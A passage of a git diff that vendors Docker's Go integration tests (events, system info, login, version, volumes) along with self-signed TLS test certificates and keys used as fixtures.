TestEventsExecDie(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.36"), "broken in earlier versions") + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + cID := container.Run(t, ctx, client) + + id, err := client.ContainerExecCreate(ctx, cID, + types.ExecConfig{ + Cmd: strslice.StrSlice([]string{"echo", "hello"}), + }, + ) + assert.NilError(t, err) + + filters := filters.NewArgs( + filters.Arg("container", cID), + filters.Arg("event", "exec_die"), + ) + msg, errors := client.Events(ctx, types.EventsOptions{ + Filters: filters, + }) + + err = client.ContainerExecStart(ctx, id.ID, + types.ExecStartCheck{ + Detach: true, + Tty: false, + }, + ) + assert.NilError(t, err) + + select { + case m := <-msg: + assert.Equal(t, m.Type, "container") + assert.Equal(t, m.Actor.ID, cID) + assert.Equal(t, m.Action, "exec_die") + assert.Equal(t, m.Actor.Attributes["execID"], id.ID) + assert.Equal(t, m.Actor.Attributes["exitCode"], "0") + case err = <-errors: + t.Fatal(err) + case <-time.After(time.Second * 3): + t.Fatal("timeout hit") + } + +} + +// Test case for #18888: Events messages have been switched from generic +// `JSONMessage` to `events.Message` types. The switch does not break the +// backward compatibility so old `JSONMessage` could still be used. +// This test verifies that backward compatibility maintains. +func TestEventsBackwardsCompatible(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + since := request.DaemonTime(ctx, t, client, testEnv) + ts := strconv.FormatInt(since.Unix(), 10) + + cID := container.Create(t, ctx, client) + + // In case there is no events, the API should have responded immediately (not blocking), + // The test here makes sure the response time is less than 3 sec. + expectedTime := time.Now().Add(3 * time.Second) + emptyResp, emptyBody, err := req.Get("/events") + assert.NilError(t, err) + defer emptyBody.Close() + assert.Check(t, is.DeepEqual(http.StatusOK, emptyResp.StatusCode)) + assert.Check(t, time.Now().Before(expectedTime), "timeout waiting for events api to respond, should have responded immediately") + + // We also test to make sure the `events.Message` is compatible with `JSONMessage` + q := url.Values{} + q.Set("since", ts) + _, body, err := req.Get("/events?" + q.Encode()) + assert.NilError(t, err) + defer body.Close() + + dec := json.NewDecoder(body) + var containerCreateEvent *jsonmessage.JSONMessage + for { + var event jsonmessage.JSONMessage + if err := dec.Decode(&event); err != nil { + if err == io.EOF { + break + } + t.Fatal(err) + } + if event.Status == "create" && event.ID == cID { + containerCreateEvent = &event + break + } + } + + assert.Check(t, containerCreateEvent != nil) + assert.Check(t, is.Equal("create", containerCreateEvent.Status)) + assert.Check(t, is.Equal(cID, containerCreateEvent.ID)) + assert.Check(t, is.Equal("busybox", containerCreateEvent.From)) +} diff --git a/vendor/github.com/docker/docker/integration/system/info_linux_test.go b/vendor/github.com/docker/docker/integration/system/info_linux_test.go new file mode 100644 index 0000000000..50fa9874b4 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/info_linux_test.go @@ -0,0 +1,48 @@ +// +build !windows + +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "net/http" + "testing" + + "github.com/docker/docker/internal/test/request" + req "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestInfoBinaryCommits(t *testing.T) { + client := request.NewAPIClient(t) + + info, err := client.Info(context.Background()) + assert.NilError(t, err) + + assert.Check(t, "N/A" != info.ContainerdCommit.ID) + assert.Check(t, is.Equal(testEnv.DaemonInfo.ContainerdCommit.Expected, info.ContainerdCommit.Expected)) + assert.Check(t, is.Equal(info.ContainerdCommit.Expected, info.ContainerdCommit.ID)) + + assert.Check(t, "N/A" != info.InitCommit.ID) + assert.Check(t, is.Equal(testEnv.DaemonInfo.InitCommit.Expected, info.InitCommit.Expected)) + assert.Check(t, is.Equal(info.InitCommit.Expected, info.InitCommit.ID)) + + assert.Check(t, "N/A" != info.RuncCommit.ID) + assert.Check(t, is.Equal(testEnv.DaemonInfo.RuncCommit.Expected, info.RuncCommit.Expected)) + assert.Check(t, is.Equal(info.RuncCommit.Expected, info.RuncCommit.ID)) +} + +func TestInfoAPIVersioned(t *testing.T) { + // Windows only supports 1.25 or later + + res, body, err := req.Get("/v1.20/info") + assert.NilError(t, err) + assert.Check(t, is.DeepEqual(res.StatusCode, http.StatusOK)) + + b, err := req.ReadBody(body) + assert.NilError(t, err) + + out := string(b) + assert.Check(t, is.Contains(out, "ExecutionDriver")) + assert.Check(t, is.Contains(out, "not supported")) +} diff --git a/vendor/github.com/docker/docker/integration/system/info_test.go b/vendor/github.com/docker/docker/integration/system/info_test.go new file mode 100644 index 0000000000..2a05dfbb74 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/info_test.go @@ -0,0 +1,42 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "fmt" + "testing" + + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestInfoAPI(t *testing.T) { + client := request.NewAPIClient(t) + + info, err := client.Info(context.Background()) + assert.NilError(t, err) + + // always shown fields + stringsToCheck := []string{ + "ID", + "Containers", + "ContainersRunning", + "ContainersPaused", + "ContainersStopped", + "Images", + "LoggingDriver", + "OperatingSystem", + "NCPU", + "OSType", + "Architecture", + "MemTotal", + "KernelVersion", + "Driver", + "ServerVersion", + "SecurityOptions"} + + out := fmt.Sprintf("%+v", info) + for _, linePrefix := range stringsToCheck { + assert.Check(t, is.Contains(out, linePrefix)) + } +} diff --git a/vendor/github.com/docker/docker/integration/system/login_test.go b/vendor/github.com/docker/docker/integration/system/login_test.go new file mode 100644 index 0000000000..ad1a8756dc --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/login_test.go @@ -0,0 +1,28 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/requirement" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +// Test case for GitHub 22244 +func TestLoginFailsWithBadCredentials(t *testing.T) { + skip.If(t, !requirement.HasHubConnectivity(t)) + + client := request.NewAPIClient(t) + + config := types.AuthConfig{ + Username: "no-user", + Password: "no-password", + } + _, err := client.RegistryLogin(context.Background(), config) + expected := "Error response from daemon: Get https://registry-1.docker.io/v2/: unauthorized: incorrect username or password" + assert.Check(t, is.Error(err, expected)) +} diff --git a/vendor/github.com/docker/docker/integration/system/main_test.go b/vendor/github.com/docker/docker/integration/system/main_test.go new file mode 100644 index 0000000000..f19a3157aa --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/main_test.go @@ -0,0 +1,33 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/system/version_test.go b/vendor/github.com/docker/docker/integration/system/version_test.go new file mode 100644 index 0000000000..8904c09b26 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/system/version_test.go @@ -0,0 +1,23 @@ +package system // import "github.com/docker/docker/integration/system" + +import ( + "context" + "testing" + + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestVersion(t *testing.T) { + client := request.NewAPIClient(t) + + version, err := client.ServerVersion(context.Background()) + assert.NilError(t, err) + + assert.Check(t, version.APIVersion != "") + assert.Check(t, version.Version != "") + assert.Check(t, version.MinAPIVersion != "") + assert.Check(t, is.Equal(testEnv.DaemonInfo.ExperimentalBuild, version.Experimental)) + assert.Check(t, is.Equal(testEnv.OSType, version.Os)) +} diff --git a/vendor/github.com/docker/docker/integration/testdata/https/ca.pem b/vendor/github.com/docker/docker/integration/testdata/https/ca.pem new file mode 100644 index 0000000000..6825d6d1bd --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/ca.pem @@ -0,0 +1,23 @@ +-----BEGIN CERTIFICATE----- +MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD +VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG +A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI +Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls +QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx +CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv +MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD +VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW +EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn +0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp +AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5 +sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV +HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09 +q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD +QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x +ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI +Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq +hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi +zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE +ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt +Zxtf5lL6KSO9Y+EFwM+rju6hm5hW +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem b/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem new file mode 100644 index 0000000000..c05ed47c2c --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem @@ -0,0 +1,73 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 3 (0x3) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Dec 4 14:17:54 2013 GMT + Not After : Dec 2 14:17:54 2023 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8: + 34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc: + f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea: + b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70: + 81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25: + 6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c: + aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa: + 65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0: + 7e:4e:78:7d:0a:9e:8f:42:43 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Comment: + Easy-RSA Generated Certificate + X509v3 Subject Key Identifier: + DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81 + X509v3 Authority Key Identifier: + keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB + DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:FD:AB:EC:6A:84:27:04:A7 + + X509v3 Extended Key Usage: + TLS Web Client Authentication + X509v3 Key Usage: + Digital Signature + Signature Algorithm: sha1WithRSAEncryption + 1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40: + 12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa: + 1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4: + af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab: + 84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31: + f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f: + 56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e: + 4a:c4 +-----BEGIN CERTIFICATE----- +MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv +cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l +MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv +bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG +EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE +ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp +ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0 +LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0 +peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB +Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73 +cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ +YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV +HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09 +q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD +QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x +ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI +Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq +hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN +AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+ +kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1 +aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem b/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem new file mode 100644 index 0000000000..b5c15f8dc7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU +9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw +gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+ +93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh +xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3 +FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN +OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC +4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU +SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe +iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy +v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl +qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw +qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5 +ksDFuNxAzbhl +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem b/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem new file mode 100644 index 0000000000..08abfd1a3b --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem @@ -0,0 +1,76 @@ +Certificate: + Data: + Version: 3 (0x2) + Serial Number: 4 (0x4) + Signature Algorithm: sha1WithRSAEncryption + Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain + Validity + Not Before: Dec 4 15:01:20 2013 GMT + Not After : Dec 2 15:01:20 2023 GMT + Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain + Subject Public Key Info: + Public Key Algorithm: rsaEncryption + Public-Key: (1024 bit) + Modulus: + 00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74: + e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae: + 67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d: + 3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32: + e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6: + 3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09: + 49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0: + c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76: + a8:05:32:1e:f9:95:09:14:75 + Exponent: 65537 (0x10001) + X509v3 extensions: + X509v3 Basic Constraints: + CA:FALSE + Netscape Cert Type: + SSL Server + Netscape Comment: + Easy-RSA Generated Server Certificate + X509v3 Subject Key Identifier: + 14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06 + X509v3 Authority Key Identifier: + keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB + DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain + serial:FD:AB:EC:6A:84:27:04:A7 + + X509v3 Extended Key Usage: + TLS Web Server Authentication + X509v3 Key Usage: + Digital Signature, Key Encipherment + Signature Algorithm: sha1WithRSAEncryption + 40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b: + ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f: + 23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4: + df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76: + c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3: + 9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c: + 12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c: + 15:42 +-----BEGIN CERTIFICATE----- +MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx +CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv +cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l +MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv +bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG +EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE +ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER +MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h +aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b +LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3 +cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch +M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG ++EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl +cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw +gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ +BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw +EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD +EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h +aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL +BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL +zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn +mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX +dDBV9m4gmmweCbQMFUI= +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem b/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem new file mode 100644 index 0000000000..c269320ef0 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx +0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y +4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+ +lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ +wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+ +wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS +IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5 +4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP +WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq ++0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv +HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj ++tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc +BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW +5nCwDu5ZTP+khltg +-----END PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/integration/volume/main_test.go b/vendor/github.com/docker/docker/integration/volume/main_test.go new file mode 100644 index 0000000000..206f7377ae --- /dev/null +++ b/vendor/github.com/docker/docker/integration/volume/main_test.go @@ -0,0 +1,33 @@ +package volume // import "github.com/docker/docker/integration/volume" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/volume/volume_test.go b/vendor/github.com/docker/docker/integration/volume/volume_test.go new file mode 100644 index 0000000000..ce42bb3040 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/volume/volume_test.go @@ -0,0 +1,116 @@ +package volume + +import ( + "context" + "fmt" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "github.com/google/go-cmp/cmp/cmpopts" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestVolumesCreateAndList(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + name := t.Name() + vol, err := client.VolumeCreate(ctx, volumetypes.VolumeCreateBody{ + Name: name, + }) + assert.NilError(t, err) + + expected := types.Volume{ + // Ignore timestamp of CreatedAt + CreatedAt: vol.CreatedAt, + Driver: "local", + Scope: "local", + Name: name, + Mountpoint: fmt.Sprintf("%s/volumes/%s/_data", testEnv.DaemonInfo.DockerRootDir, name), + } + assert.Check(t, is.DeepEqual(vol, expected, cmpopts.EquateEmpty())) + + volumes, err := client.VolumeList(ctx, filters.Args{}) + assert.NilError(t, err) + + assert.Check(t, is.Equal(len(volumes.Volumes), 1)) + assert.Check(t, volumes.Volumes[0] != nil) + assert.Check(t, is.DeepEqual(*volumes.Volumes[0], expected, cmpopts.EquateEmpty())) +} + +func TestVolumesRemove(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + id := container.Create(t, ctx, client, container.WithVolume(prefix+slash+"foo")) + + c, err := client.ContainerInspect(ctx, id) + assert.NilError(t, err) + vname := c.Mounts[0].Name + + err = client.VolumeRemove(ctx, vname, false) + assert.Check(t, is.ErrorContains(err, "volume is in use")) + + err = client.ContainerRemove(ctx, id, types.ContainerRemoveOptions{ + Force: true, + }) + assert.NilError(t, err) + + err = client.VolumeRemove(ctx, vname, false) + assert.NilError(t, err) +} + +func TestVolumesInspect(t *testing.T) { + skip.If(t, testEnv.IsRemoteDaemon, 